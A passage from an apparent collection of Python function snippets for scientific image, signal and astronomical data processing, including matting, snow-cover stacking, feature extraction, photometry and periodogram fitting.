np.mean(F, axis=0)\n cov_F = np.cov(F.T)\n\n try:\n inv_cov_B = np.linalg.inv(cov_B)\n inv_cov_F = np.linalg.inv(cov_F)\n except LinAlgError:\n print(\"LinAlgError\")\n\n for i in range(it):\n print(\"Iteration {}\".format(i))\n for row in range(nrows):\n for col in range(ncols):\n if trimap[row, col] == 
128:\n f, g = calculate_fg(img[row, col], alpha[row, col], mean_F, inv_cov_F, mean_B, inv_cov_B, sigma_d)\n alpha[row, col] = calculate_alpha(img[row, col], f, g)\n\n alpha = np.clip(alpha, 0, 1)\n\n return alpha", "def proc_modscag(fn_list, extent=None, t_srs=None):\n #Use cubic spline here for improve upsampling \n ds_list = warplib.memwarp_multi_fn(fn_list, res='min', extent=extent, t_srs=t_srs, r='cubicspline')\n stack_fn = os.path.splitext(fn_list[0])[0] + '_' + os.path.splitext(os.path.split(fn_list[-1])[1])[0] + '_stack_%i' % len(fn_list) \n #Create stack here - no need for most of mastack machinery, just make 3D array\n #Mask values greater than 100% (clouds, bad pixels, etc)\n ma_stack = np.ma.array([np.ma.masked_greater(iolib.ds_getma(ds), 100) for ds in np.array(ds_list)], dtype=np.uint8)\n\n stack_count = np.ma.masked_equal(ma_stack.count(axis=0), 0).astype(np.uint8)\n stack_count.set_fill_value(0)\n stack_min = ma_stack.min(axis=0).astype(np.uint8)\n stack_min.set_fill_value(0)\n stack_max = ma_stack.max(axis=0).astype(np.uint8)\n stack_max.set_fill_value(0)\n stack_med = np.ma.median(ma_stack, axis=0).astype(np.uint8)\n stack_med.set_fill_value(0)\n\n out_fn = stack_fn + '_count.tif'\n iolib.writeGTiff(stack_count, out_fn, ds_list[0])\n out_fn = stack_fn + '_max.tif'\n iolib.writeGTiff(stack_max, out_fn, ds_list[0])\n out_fn = stack_fn + '_min.tif'\n iolib.writeGTiff(stack_min, out_fn, ds_list[0])\n out_fn = stack_fn + '_med.tif'\n iolib.writeGTiff(stack_med, out_fn, ds_list[0])\n\n ds = gdal.Open(out_fn)\n return ds", "def all_feature_extractor(imgpath):\r\n\r\n image = cv2.imread(imgpath)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\r\n # Extracting Gabor Features\r\n feature_dict = gabor_feature_extractor(image)\r\n\r\n feature_dict['Original'] = image\r\n\r\n entropy_img = entropy(image, disk(1))\r\n feature_dict['Entropy'] = entropy_img\r\n\r\n gaussian3_img = nd.gaussian_filter(image, sigma=3)\r\n feature_dict['Gaussian3'] = gaussian3_img\r\n\r\n gaussian7_img = nd.gaussian_filter(image, sigma=7)\r\n feature_dict['Gaussian7'] = gaussian7_img\r\n\r\n sobel_img = sobel(image)\r\n feature_dict['Sobel'] = sobel_img\r\n\r\n canny_edge_img = cv2.Canny(image, 100, 200)\r\n feature_dict['Canny'] = canny_edge_img\r\n\r\n robert_edge_img = roberts(image)\r\n feature_dict['Robert'] = robert_edge_img\r\n\r\n scharr_edge = scharr(image)\r\n feature_dict['Scharr'] = scharr_edge\r\n\r\n prewitt_edge = prewitt(image)\r\n feature_dict['Prewitt'] = prewitt_edge\r\n\r\n median_img = nd.median_filter(image, size=3)\r\n feature_dict['Median'] = median_img\r\n\r\n variance_img = nd.generic_filter(image, np.var, size=3)\r\n feature_dict['Variance'] = variance_img\r\n\r\n return feature_dict", "def get_stamps(full_image, Args):\n print (\"getting individual stamps\")\n nrows = int(np.ceil(Args.num / Args.num_columns)) # Total number of rows\n out_size = Args.out_size\n low = int(Args.in_size / 2 - out_size / 2)\n high = int(Args.in_size / 2 + out_size / 2)\n nStamp = (nrows, Args.num_columns)\n stampSize = Args.in_size\n s2 = np.hstack(np.split(full_image,nStamp[0])).T.reshape(nStamp[0]*nStamp[1],\n stampSize, stampSize)\n stamps = s2[:, low:high, low:high]\n return stamps", "def getstretchlimits(tiffile):\n im = gdal.Open(tiffile)\n imarray = np.dstack(\n [\n im.GetRasterBand(1).ReadAsArray(),\n im.GetRasterBand(2).ReadAsArray(),\n im.GetRasterBand(3).ReadAsArray(),\n ]\n )\n\n # imarray = imarray[imarray > 10] # get rid of the values near zero\n # return (imarray.dtype, 
imarray.shape)\n return [np.percentile(imarray, 1), np.percentile(imarray, 99)]", "def get_template_series(self, nb_images):\n\n # Tab for the series of images\n self.template = []\n\n # Tab\n temp = []\n\n # Make current position the zero position\n self.arm.set_to_zero([0, 1, 2])\n self.microscope.set_to_zero([0, 1, 2])\n\n # Take imges only in the template zone\n template = self.template_zone()\n height, width = template.shape[:2]\n\n # Tab of weight to detect where the pipette is\n weight = []\n\n # Detecting the tip\n for i in range(3):\n for j in range(3):\n if (i != 1) & (j != 1):\n # divide template zone into 8 images\n temp = template[i * height / 4:height / 2 + i * height / 4, j * width / 4:width / 2 + j * width / 4]\n\n # Search the tip using the number of darkest pixel in the image\n bin_edge, _ = np.histogram(temp.flatten())\n weight += [bin_edge.min()]\n else:\n # image is the center of template zone, do not consider to have functional get_withdraw_sign method\n weight += [-1]\n\n # pipette is in the image with the most darkest pixels\n index = weight.index(max(weight))\n j = index % 3\n i = index // 3\n\n # Update the position of the tip in image\n self.template_loc = [temp.shape[1] * (1 - j / 2.), temp.shape[0] * (1 - i / 2.)]\n\n # Get the series of template images at different height\n for k in range(nb_images):\n self.microscope.absolute_move(k - (nb_images - 1) / 2, 2)\n self.microscope.wait_motor_stop(2)\n time.sleep(1)\n img = self.template_zone()\n height, width = img.shape[:2]\n img = img[i * height / 4:height / 2 + i * height / 4, j * width / 4:width / 2 + j * width / 4]\n self.template += [img]\n\n # reset position at the end\n self.go_to_zero()\n pass", "def apply_gaussian(X, sigma):\n return np.array([ndimage.gaussian_filter(x, sigma) for x in X])", "def get_brightest_mean(self, num_pix=3):\n peak_x = np.zeros(\n [len(self.pixel_x)]) # Create blank arrays for peaks\n # rather than a dict (faster)\n peak_y = np.zeros(peak_x.shape)\n peak_amp = np.zeros(peak_x.shape)\n\n # Loop over all tels to take weighted average of pixel\n # positions This loop could maybe be replaced by an array\n # operation by a numpy wizard\n\n tel_num = 0\n for tel in self.image:\n top_index = self.image[tel].argsort()[-1 * num_pix:][::-1]\n print(top_index, self.pixel_x[tel][top_index],\n self.image[tel][top_index])\n weight = self.image[tel][top_index]\n weighted_x = self.pixel_x[tel][top_index] * weight\n weighted_y = self.pixel_y[tel][top_index] * weight\n\n ppx = np.sum(weighted_x) / np.sum(weight)\n ppy = np.sum(weighted_y) / np.sum(weight)\n\n peak_x[tel_num] = ppx # Fill up array\n peak_y[tel_num] = ppy\n peak_amp[tel_num] = np.sum(weight)\n tel_num += 1\n\n self.peak_x = peak_x # * unit # Add to class member\n self.peak_y = peak_y # * unit\n self.peak_amp = peak_amp", "def where_are_gaussians(img):\n list_of_sigmas = [40,30,20,10]\n mask=np.zeros(img.shape,dtype=bool)\n for sigma in list_of_sigmas:\n stack_to_remove,locs=find_gaussian(img.astype(np.uint8),sigma)\n w = stack_to_remove[:,:,0].shape[0]\n a,b=np.ogrid[-w/2:w/2,-w/2:w/2]\n for i in range(stack_to_remove.shape[2]):\n pt=(locs[0][i],locs[1][i])\n mask[pt[0]:pt[0]+w,pt[1]:pt[1]+w] = True\n return mask", "def getHists(img,bins=50):\n hists = np.array([])\n for i in range(3):#Images are loaded as three-dimensional matrices with three channels\n hists = np.append(hists,np.histogram(img[:,:,i], bins, density = True)[0])\n return hists", "def SIP(\n tpfs,\n sigma=5,\n min_period=10,\n max_period=100,\n nperiods=300,\n 
npca_components=2,\n aperture_threshold=3,\n sff=False,\n sff_kwargs={},\n):\n\n # Get the un-background subtracted data\n if hasattr(tpfs[0], \"flux_bkg\"):\n tpfs_uncorr = [\n (tpf + np.nan_to_num(tpf.flux_bkg))[\n np.isfinite(np.nansum(tpf.flux_bkg, axis=(1, 2)))\n ]\n for tpf in tpfs\n ]\n else:\n tpfs_uncorr = tpfs\n\n apers = [\n tpf.pipeline_mask\n if tpf.pipeline_mask.any()\n else tpf.create_threshold_mask(aperture_threshold)\n for tpf in tpfs_uncorr\n ]\n bkg_apers = [\n (~aper) & (np.nansum(tpf.flux, axis=0) != 0)\n for aper, tpf in zip(apers, tpfs_uncorr)\n ]\n lc = (\n lk.LightCurveCollection(\n [\n tpf.to_lightcurve(aperture_mask=aper)\n for tpf, aper in zip(tpfs_uncorr, apers)\n ]\n )\n .stitch(lambda x: x)\n .normalize()\n )\n lc.flux_err.value[~np.isfinite(lc.flux_err.value)] = np.nanmedian(lc.flux_err.value)\n\n # Run the same routines on the background pixels\n lc_bkg = (\n lk.LightCurveCollection(\n [\n tpf.to_lightcurve(aperture_mask=bkg_aper)\n for tpf, bkg_aper in zip(tpfs_uncorr, bkg_apers)\n ]\n )\n .stitch(lambda x: x)\n .normalize()\n )\n lc_bkg.flux_err.value[~np.isfinite(lc_bkg.flux_err.value)] = np.nanmedian(\n lc_bkg.flux_err.value\n )\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n bkgs = [\n lk.correctors.DesignMatrix(tpf.flux.value[:, bkg_aper], name=\"bkg\")\n .pca(npca_components)\n .append_constant()\n .to_sparse()\n for tpf, bkg_aper in zip(tpfs_uncorr, bkg_apers)\n ]\n for bkg in bkgs:\n bkg.prior_mu[-1] = 1\n bkg.prior_sigma[-1] = 0.1\n\n bkg.prior_mu[:-1] = 0\n bkg.prior_sigma[:-1] = 0.1\n\n # Split at the datadownlink\n bkgs = [\n bkg.split(list((np.where(np.diff(tpf.time.jd) > 0.3)[0] + 1)))\n for bkg, tpf in zip(bkgs, tpfs_uncorr)\n ]\n systematics_dm = vstack(bkgs)\n\n sigma_f_inv = sparse.csr_matrix(1 / lc.flux_err.value[:, None] ** 2)\n\n def fit_model(lc, mask=None, return_model=False):\n if mask is None:\n mask = np.ones(len(lc.flux.value), bool)\n sigma_w_inv = dm.X[mask].T.dot(dm.X[mask].multiply(sigma_f_inv[mask])).toarray()\n sigma_w_inv += np.diag(1.0 / dm.prior_sigma ** 2)\n\n B = dm.X[mask].T.dot((lc.flux.value[mask] / lc.flux_err.value[mask] ** 2))\n B += dm.prior_mu / dm.prior_sigma ** 2\n w = np.linalg.solve(sigma_w_inv, B)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n werr = ((np.linalg.inv(sigma_w_inv)) ** 0.5).diagonal()\n if return_model:\n return dm.X.dot(w)\n return w, werr\n\n # Make a dummy design matrix\n period = 27\n ls_dm = lk.correctors.DesignMatrix(\n lombscargle.implementations.mle.design_matrix(\n lc.time.jd, frequency=1 / period, bias=False, nterms=1\n ),\n name=\"LS\",\n ).to_sparse()\n dm = lk.correctors.SparseDesignMatrixCollection(\n [systematics_dm, ls_dm]\n ).to_designmatrix(name=\"design_matrix\")\n\n if sff:\n sff_dm = []\n for tpf in tpfs_uncorr:\n s = lk.correctors.SFFCorrector(tpf.to_lightcurve())\n _ = s.correct(**sff_kwargs)\n sff_dm.append(s.dmc[\"sff\"].to_sparse())\n sff_dm = vstack(sff_dm)\n dm = lk.correctors.SparseDesignMatrixCollection([dm, sff_dm]).to_designmatrix(\n name=\"design_matrix\"\n )\n\n # Do a first pass at 27 days, just to find ridiculous outliers\n mod = fit_model(lc, return_model=True)\n mask = ~(lc - mod * lc.flux.unit).remove_outliers(return_mask=True, sigma=sigma)[1]\n\n # Loop over some periods we care about\n periods = 1 / np.linspace(1 / min_period, 1 / max_period, nperiods)\n ws = np.zeros((len(periods), dm.X.shape[1]))\n ws_err = np.zeros((len(periods), dm.X.shape[1]))\n ws_bkg = np.zeros((len(periods), dm.X.shape[1]))\n 
ws_err_bkg = np.zeros((len(periods), dm.X.shape[1]))\n\n for idx, period in enumerate(tqdm(periods, desc=\"Running pixels in aperture\")):\n dm.X[:, -ls_dm.shape[1] :] = lombscargle.implementations.mle.design_matrix(\n lc.time.jd, frequency=1 / period, bias=False, nterms=1\n )\n ws[idx], ws_err[idx] = fit_model(lc, mask=mask)\n ws_bkg[idx], ws_err_bkg[idx] = fit_model(lc_bkg, mask=mask)\n power = (ws[:, -2] ** 2 + ws[:, -1] ** 2) ** 0.5\n am = np.argmax(power)\n dm.X[:, -ls_dm.shape[1] :] = lombscargle.implementations.mle.design_matrix(\n lc.time.jd, frequency=1 / periods[am], bias=False, nterms=1\n )\n mod = dm.X[:, :-2].dot(ws[am][:-2])\n\n power_bkg = (ws_bkg[:, -2] ** 2 + ws_bkg[:, -1] ** 2) ** 0.5\n\n r = {\n \"periods\": periods,\n \"power\": power,\n \"raw_lc\": lc,\n \"power_bkg\": power_bkg,\n \"raw_lc_bkg\": lc_bkg,\n \"corr_lc\": lc - mod * lc.flux.unit + 1,\n \"period_at_max_power\": periods[am],\n }\n\n return r", "def _compute_stack_mean_and_uncertainty(self, starMask, iters=5,\n backgroundClipSigma=5.0, starClipSigma=40.0):\n # Extract the number of images (nz) and the shape of the images (ny, nx)\n nz, ny, nx = self.shape\n\n # Test for the number of bits in each pixel (or just assum 64 bits)\n bitsPerPixel = 64\n\n # Compute the number of rows to process at a given time\n numberOfRows, numSections = self._get_number_of_rows_to_process(bitsPerPixel)\n print('Processing stack in {0} sections of {1} rows'.format(\n numSections, numberOfRows))\n\n # Compute the sigma-clipping starting points and increments\n tmp = self._get_sigma_clip_start_and_steps(\n iters=iters,\n backgroundClipSigma=backgroundClipSigma,\n starClipSigma=starClipSigma\n )\n backgroundClipStart, backgroundClipStep, starClipStart, starClipStep = tmp\n\n # Initalize an empty array to hold the output\n outMean = np.zeros((ny, nx))\n outUncert = np.zeros((ny, nx))\n\n for sectionNumber in range(numSections):\n print('Starting section number {0}'.format(sectionNumber+ 1 ))\n # Compute the range of rows to extract\n startRow, endRow = self._get_start_and_end_rows(\n sectionNumber, numberOfRows\n )\n\n # Extract the data for this section\n dataSubStack = self._extract_data_sub_stack(startRow, endRow)\n\n # Extract the uncertainty for this section\n uncertSubStack = self._extract_uncert_sub_stack(startRow, endRow)\n\n # Extract the starSubMask for this section\n if issubclass(type(starMask), np.ndarray):\n starSubMask = starMask[startRow:endRow, :]\n elif issubclass(type(starMask), bool):\n starSubMask = starMask\n\n # Build the bad pixel mask for this subStack\n dataSubStack = self._construct_sub_stack_bad_pixel_mask(\n dataSubStack,\n starSubMask,\n iters=iters,\n backgroundClipStart=backgroundClipStart,\n backgroundClipStep=backgroundClipStep,\n starClipStart=starClipStart,\n starClipStep=starClipStep\n )\n\n # Compute the mean and uncertainty of the masked array\n mean, uncert = self._compute_masked_mean_and_uncertainty(\n dataSubStack, uncertSubStack)\n\n # Store the result in the output\n outMean[startRow:endRow, :] = mean\n outUncert[startRow:endRow, :] = uncert\n\n return outMean, outUncert", "def autoExtract(array):#Extract signal from a 1D-array\n \n derivmax = medianFilter(derivation(array)).argmax()\n derivmin = medianFilter(derivation(array)).argmin()\n i = 0\n extraction = []\n while i < len(array) or i <= 300:\n if i >= derivmax and i <= derivmin:\n extraction.append(array[i])\n i = i+1\n extraction = np.array(extraction)\n derivmax = derivmax\n derivmin = derivmin\n return extraction", "def 
array_to_spiketrains(array, bin_size):\n stList = []\n for trial in range(len(array)):\n trialList = []\n for channel in range(array.shape[2]):\n times = np.nonzero(array[trial, :, channel])[0]\n counts = array[trial, times, channel].astype(int)\n times = np.repeat(times, counts)\n st = neo.SpikeTrain(times*bin_size*pq.ms, t_stop=array.shape[1]*bin_size*pq.ms)\n trialList.append(st)\n stList.append(trialList)\n return stList", "def _random_jitter(self, sampling_results, img_metas, amplitude=0.15):\n for sampling_result, img_meta in zip(sampling_results, img_metas):\n bboxes = sampling_result.pos_bboxes\n random_offsets = bboxes.new_empty(bboxes.shape[0], 4).uniform_(\n -amplitude, amplitude)\n # before jittering\n cxcy = (bboxes[:, 2:4] + bboxes[:, :2]) / 2\n wh = (bboxes[:, 2:4] - bboxes[:, :2]).abs()\n # after jittering\n new_cxcy = cxcy + wh * random_offsets[:, :2]\n new_wh = wh * (1 + random_offsets[:, 2:])\n # xywh to xyxy\n new_x1y1 = (new_cxcy - new_wh / 2)\n new_x2y2 = (new_cxcy + new_wh / 2)\n new_bboxes = torch.cat([new_x1y1, new_x2y2], dim=1)\n # clip bboxes\n max_shape = img_meta['img_shape']\n if max_shape is not None:\n new_bboxes[:, 0::2].clamp_(min=0, max=max_shape[1] - 1)\n new_bboxes[:, 1::2].clamp_(min=0, max=max_shape[0] - 1)\n\n sampling_result.pos_bboxes = new_bboxes\n return sampling_results", "def FAP_dist(peak_amps, Nbins=1000):\n zmin = np.linspace(0, peak_amps.max(), Nbins)\n FAP = np.zeros(Nbins)\n for i in range(Nbins):\n FAP[i] = (peak_amps > zmin[i]).sum()\n FAP /= peak_amps.shape[0] # Normalize\n return zmin, FAP", "def get_peaks(self, spectrum, amplitude):\n peaks = []\n average_noise_level = self._get_average_noise_level(amplitude)\n\n for i, a in enumerate(amplitude):\n noise = next(average_noise_level)\n\n if a / noise > self.threshold and self._is_max(amplitude[i-1], a, amplitude[i+1]):\n peaks.append(tuple([spectrum[i], a, noise]))\n\n peaks.sort(reverse=True, key=lambda x: x[1] / x[2])\n \n if len(peaks) > self.peaks_arr_size:\n del peaks[self.sample_arr_size:]\n\n return peaks", "def testStatisticsRamp(self):\n\n \n nx = 101\n ny = 64\n img = afwImage.ImageF(afwGeom.Extent2I(nx, ny))\n \n z0 = 10.0\n dzdx = 1.0\n mean = z0 + (nx/2)*dzdx\n stdev = 0.0\n for y in range(ny):\n for x in range(nx):\n z = z0 + dzdx*x\n img.set(x, y, z)\n stdev += (z - mean)*(z - mean)\n\n stdev = math.sqrt(stdev/(nx*ny - 1))\n \n stats = afwMath.makeStatistics(img, afwMath.NPOINT | afwMath.STDEV | afwMath.MEAN)\n testmean = stats.getValue(afwMath.MEAN)\n teststdev = stats.getValue(afwMath.STDEV)\n \n self.assertEqual(stats.getValue(afwMath.NPOINT), nx*ny)\n self.assertEqual(testmean, mean)\n self.assertEqual(teststdev, stdev )\n \n stats = afwMath.makeStatistics(img, afwMath.STDEV | afwMath.MEAN | afwMath.ERRORS)\n mean, meanErr = stats.getResult(afwMath.MEAN)\n sd = stats.getValue(afwMath.STDEV)\n \n self.assertEqual(mean, img.get(nx/2, ny/2))\n self.assertEqual(meanErr, sd/math.sqrt(img.getWidth()*img.getHeight()))\n \n # ===============================================================================\n # sjb code for percentiles and clipped stats\n \n stats = afwMath.makeStatistics(img, afwMath.MEDIAN)\n self.assertEqual(z0 + dzdx*(nx - 1)/2.0, stats.getValue(afwMath.MEDIAN))\n \n stats = afwMath.makeStatistics(img, afwMath.IQRANGE)\n self.assertEqual(dzdx*(nx - 1)/2.0, stats.getValue(afwMath.IQRANGE))\n \n stats = afwMath.makeStatistics(img, afwMath.MEANCLIP)\n self.assertEqual(z0 + dzdx*(nx - 1)/2.0, stats.getValue(afwMath.MEANCLIP))", "def skystats(stamp):\n\t\n\tif 
isinstance(stamp, galsim.Image):\n\t\ta = stamp.array\n\t\t# Normally there should be a .transpose() here, to get the orientation right.\n\t\t# But in the present case it doesn't change anything, and we can skip it.\n\telse:\n\t\ta = stamp # Then we assume that it's simply a numpy array.\n\t\n\tedgepixels = np.concatenate([\n\t\t\ta[0,1:], # left\n\t\t\ta[-1,1:], # right\n\t\t\ta[:,0], # bottom\n\t\t\ta[1:-1,-1] # top\n\t\t\t])\n\tassert len(edgepixels) == 2*(a.shape[0]-1) + 2*(a.shape[0]-1)\n\n\t# And we convert the mad into an estimate of the Gaussian std:\n\treturn {\n\t\t\"std\":np.std(edgepixels), \"mad\": 1.4826 * mad(edgepixels),\n\t\t\"mean\":np.mean(edgepixels), \"med\":np.median(edgepixels),\n\t\t\"stampsum\":np.sum(a)\n\t\t}", "def get_mean_in_time(trajectories, nb_bins=15, freq_range=[0.4, 0.6]):\n # Create bins and select trajectories going through the freq_range\n time_bins = np.linspace(-950, 2000, nb_bins)\n trajectories = [traj for traj in trajectories if np.sum(np.logical_and(\n traj.frequencies >= freq_range[0], traj.frequencies < freq_range[1]), dtype=bool)]\n\n # Offset trajectories to set t=0 at the point they are seen in the freq_range and adds all the frequencies / times\n # to arrays for later computation of mean\n t_traj = np.array([])\n f_traj = np.array([])\n for traj in trajectories:\n idx = np.where(np.logical_and(traj.frequencies >=\n freq_range[0], traj.frequencies < freq_range[1]))[0][0]\n traj.t = traj.t - traj.t[idx]\n t_traj = np.concatenate((t_traj, traj.t))\n f_traj = np.concatenate((f_traj, traj.frequencies))\n\n # Binning of all the data in the time bins\n filtered_fixed = [traj for traj in trajectories if traj.fixation == \"fixed\"]\n filtered_lost = [traj for traj in trajectories if traj.fixation == \"lost\"]\n freqs, fixed, lost = [], [], []\n for ii in range(len(time_bins) - 1):\n freqs = freqs + [f_traj[np.logical_and(t_traj >= time_bins[ii], t_traj < time_bins[ii + 1])]]\n fixed = fixed + [len([traj for traj in filtered_fixed if traj.t[-1] < time_bins[ii]])]\n lost = lost + [len([traj for traj in filtered_lost if traj.t[-1] < time_bins[ii]])]\n\n # Computation of the mean in each bin, active trajectories contribute their current frequency,\n # fixed contribute1 and lost contribute 0\n mean = []\n for ii in range(len(freqs)):\n mean = mean + [np.sum(freqs[ii]) + fixed[ii]]\n mean[-1] /= (len(freqs[ii]) + fixed[ii] + lost[ii])\n\n nb_active = [len(freq) for freq in freqs]\n nb_dead = [fixed[ii] + lost[ii] for ii in range(len(fixed))]\n\n return 0.5 * (time_bins[1:] + time_bins[:-1]), mean, nb_active, nb_dead", "def process_tir_image(ds, data_res, t_thresh=-50, min_mcs_size=5000):\n ctt = (ds['tb']).squeeze()-273.15\n min_pix_nb = min_mcs_size / data_res**2\n\n max_pix_nb = 300000 / data_res**2 # this is to capture satellite artefacts that come in large contiguous stripes.\n labels, goodinds = mcs_define(ctt.values, t_thresh, minmax_area=[min_pix_nb, max_pix_nb]) # 7.7x7.7km = 64km2 per pix in gridsat? 
83 pix is 5000km2\n dic = dictionary()\n #plt.figure()\n #plt.pcolormesh(labels)\n #plt.colorbar()\n #plt.show()\n for g in goodinds:\n\n if g==0:\n continue\n\n pos = np.where(labels==g)\n npos = np.where(labels!=g)\n datestr = str(int(ctt['time.year'].values))+'-'+str(int(ctt['time.month'].values)).zfill(2)+'-'+str(int(ctt['time.day'].values)).zfill(2)+'_'+\\\n str(int(ctt['time.hour'].values)).zfill(2)+':'+str(int(ctt['time.minute'].values)).zfill(2)\n \n dic['date'].append(datestr)\n dic['month'].append(int(ctt['time.month']))\n dic['hour'].append(int(ctt['time.hour']))\n dic['year'].append(int(ctt['time.year']))\n dic['day'].append(int(ctt['time.day']))\n dic['minute'].append(int(ctt['time.minute']))\n\n storm = ctt.copy()\n storm.values[npos] = np.nan\n tmin_pos = np.nanargmin(storm.values)\n tpos_2d = np.unravel_index(tmin_pos, storm.shape)\n \n latmin = np.nanmin(ctt.lat.values[pos[0]])\n latmax = np.nanmax(ctt.lat.values[pos[0]])\n lonmin = np.nanmin(ctt.lon.values[pos[1]])\n lonmax = np.nanmax(ctt.lon.values[pos[1]])\n dic['area'].append(np.sum(np.isfinite(storm.values))*data_res**2)\n dic['70area'].append(np.sum(storm.values<=-70)*data_res**2)\n dic['minlon'].append(lonmin)\n dic['minlat'].append(latmin)\n dic['maxlon'].append(lonmax)\n dic['maxlat'].append(latmax)\n dic['clon'].append(lonmin + (lonmax - lonmin)/2)\n dic['clat'].append(latmin + (latmax - latmin)/2)\n dic['tmin'].append(np.nanmin(storm))\n dic['tminlat'].append(float(ctt.lat[tpos_2d[0]].values))\n dic['tminlon'].append(float(ctt.lon[tpos_2d[1]].values))\n dic['tmean'].append(float(np.nanmean(storm)))\n dic['tp1'].append(float(np.nanpercentile(storm, 1)))\n dic['tp99'].append(float(np.nanpercentile(storm, 99)))\n dic['stormID'].append(datestr + '_' + str(g))\n dic['cloudMask'].append(labels==g)\n dic['tir'].append(storm.values)\n\n # for k in dic.keys():\n # print(k, len(dic[k]))\n return dic", "def spectrum_multi_taper(self):\r\n if np.iscomplexobj(self.input.data):\r\n psd_len = self.input.shape[-1] \r\n dt = complex\r\n else:\r\n psd_len = self.input.shape[-1] / 2 + 1\r\n dt = float\r\n\r\n #Initialize the output\r\n spectrum_multi_taper = np.empty((self.input.shape[:-1] + (psd_len,)),\r\n dtype=dt)\r\n\r\n #If multi-channel data:\r\n if len(self.input.data.shape) > 1:\r\n for i in range(self.input.data.shape[0]):\r\n # 'f' are the center frequencies of the frequency bands\r\n # represented in the MT psd. 
These are identical in each\r\n # iteration of the loop, so they get reassigned into the same\r\n # variable in each iteration:\r\n f, spectrum_multi_taper[i], _ = tsa.multi_taper_psd(\r\n self.input.data[i],\r\n Fs=self.input.sampling_rate,\r\n BW=self.BW,\r\n adaptive=self.adaptive,\r\n low_bias=self.low_bias)\r\n else:\r\n f, spectrum_multi_taper, _ = tsa.multi_taper_psd(self.input.data,\r\n Fs=self.input.sampling_rate,\r\n BW=self.BW,\r\n adaptive=self.adaptive,\r\n low_bias=self.low_bias)\r\n\r\n return f, spectrum_multi_taper", "def filter_gaps(msa_obj, gap_cutoff=0.5):\n # msa must be a list\n import numpy as np\n alphabet = \"ARNDCQEGHILKMFPSTWYV-\"\n states = len(alphabet)\n tmp = (msa_obj == states - 1).astype(np.float)\n non_gaps = np.where(np.sum(tmp.T, -1).T / msa_obj.shape[0] < gap_cutoff)[0]\n return msa_obj[:, non_gaps], non_gaps", "def n_finder(gt_mat, x, eps):\n numsnps = int(0.9*gt_mat.shape[0])\n assert(x < numsnps)\n assert(eps > 0 and eps<= 1.0)\n indices = np.random.choice(numsnps, size=x, replace=False)\n n = 0\n avg_array = np.zeros(gt_mat.shape[0])\n going = True\n while going:\n r2_list = [np.corrcoef(gt_mat[i,:],gt_mat[i+n,:])[0,1]**2 for i in indices]\n avg_array[n] = np.nanmean(r2_list)\n n += 1\n if np.mean(r2_list) < eps:\n going = False \n return n,avg_array[:n]", "def estimate_peaks(samples, thresh=0.02):\n pks = find_peaks(samples, prominence=thresh)\n npks = np.ones(len(samples), dtype=bool)\n npks[pks[0]] = False\n return np.mean(samples[pks[0]])/np.mean(samples[npks]), len(pks[0])", "def aperphot(fn, timekey=None, pos=[0,0], dap=[2,4,6], mask=None, verbose=False, nanval=999, resamp=None, retfull=False):\n # 2009-09-14 10:49 IJC: Created\n # 2010-01-15 14:20 IJC: Added numpy \"_string\" check\n # 2011-12-29 12:01 IJMC: Added peak pixel values to photometry report.\n # 2012-01-25 11:26 IJMC: Adding \"resamp\" option -- thanks to\n # K. Stevenson and J. Harrington of UCF for\n # the suggestion.\n # 2012-02-26 11:53 IJMC: Now return 'ntarg' and 'nsky' -- number of pixels used.\n # 2012-06-07 08:27 IJMC: 'peak' values are now corrected for the\n # resampling factor.\n # 2012-07-03 10:35 IJMC: Fixed a key bug: frames were not\n # correctly background-subtracted when\n # applying partial-pixel resampling.\n # 2012-10-19 13:41 IJMC: Documented 'retfull' option; changed default.\n # 2013-03-20 09:21 IJMC: More error-checking for saving header\n # keywords. Thanks to A. Weigel @\n # ETH-Zurich for catching this!\n\n from numpy import meshgrid, median,isfinite,sort,ndarray,string_\n import numpy as np\n import pyfits\n #from analysis import fixval\n from os import path\n from scipy import interpolate\n\n thisobs = phot()\n x0, y0 = pos\n dap_targ, dap_skyinner, dap_skyouter = dap\n if resamp is None or resamp<1:\n resamp = 1\n else:\n resamp = float(resamp)\n \n # Determine size:\n if isinstance(fn,str):\n nx = pyfits.getval(fn, 'NAXIS1')\n ny = pyfits.getval(fn, 'NAXIS2')\n elif isinstance(fn,ndarray):\n nx,ny = fn.shape\n\n nx0, ny0 = nx, ny\n nx = ((nx - 1)*resamp + 1.) # Avoid resampling at pixel locations\n ny = ((ny - 1)*resamp + 1.) 
# outside the original boundaries.\n\n # Generate or load masks:\n if mask==None:\n xx,yy = meshgrid(np.arange(ny)/resamp, np.arange(nx)/resamp)\n mask_targ = makemask(xx, yy, (x0, y0, dap_targ))\n mask_s1 = makemask(xx, yy, (x0,y0, dap_skyinner))\n mask_s2 = makemask(xx, yy, (x0,y0, dap_skyouter))\n mask_sky = mask_s2 - mask_s1\n else:\n mask_targ = mask==1\n mask_sky = mask==2\n if resamp>1:\n print \"In aperphot, resamp>1 and user-specified mask passed in... beware!\"\n\n # Load data frame:\n thisobs = phot()\n if isinstance(fn,ndarray):\n frame = fn\n elif isinstance(fn, str) or isinstance(fn,string_):\n if not path.isfile(fn):\n print \"file %s not found! exiting...\" % fn\n return thisobs\n frame = pyfits.getdata(fn)\n fixval(frame, nanval)\n\n # Resample data frame\n if resamp>1:\n frame0 = frame.copy()\n xx0 = range(nx0)\n yy0 = range(ny0)\n x1,y1 = np.arange(nx)/resamp, np.arange(ny)/resamp\n rectspline = interpolate.fitpack2.RectBivariateSpline(xx0, yy0, frame0, kx=1, ky=1, s=0)\n frame = rectspline(x1, y1)\n\n #from pylab import *\n #pdb.set_trace()\n # Measure background and aperture photometry\n thisbg, thisebg = estbg(frame, mask=mask_sky, plotalot=verbose, rout=[3,99])\n thisphot = (mask_targ*(frame - thisbg)).sum() /resamp/resamp\n peak = frame.max()\n peak_targ = (mask_targ * frame).max()\n peak_annulus = (mask_sky * frame).max()\n\n thisobs.bg=thisbg\n thisobs.ebg=thisebg\n thisobs.bgstr='phot.estbg: SDOM on bg histogram mean & dispersion after outlier rejection'\n thisobs.phot=thisphot\n thisobs.photstr='by-hand background-subtracted aperture photometry'\n thisobs.ntarg = mask_targ.sum()/resamp/resamp\n thisobs.nsky = mask_sky.sum()/resamp/resamp\n\n thisobs.peak = peak\n thisobs.peak_targ = peak_targ\n thisobs.peak_annulus = peak_annulus\n thisobs.peakstr = 'peak pixel value in frame'\n thisobs.peak_targstr = 'peak pixel value in target aperture'\n thisobs.peak_annulusstr = 'peak pixel value in sky annulus'\n thisobs.position = 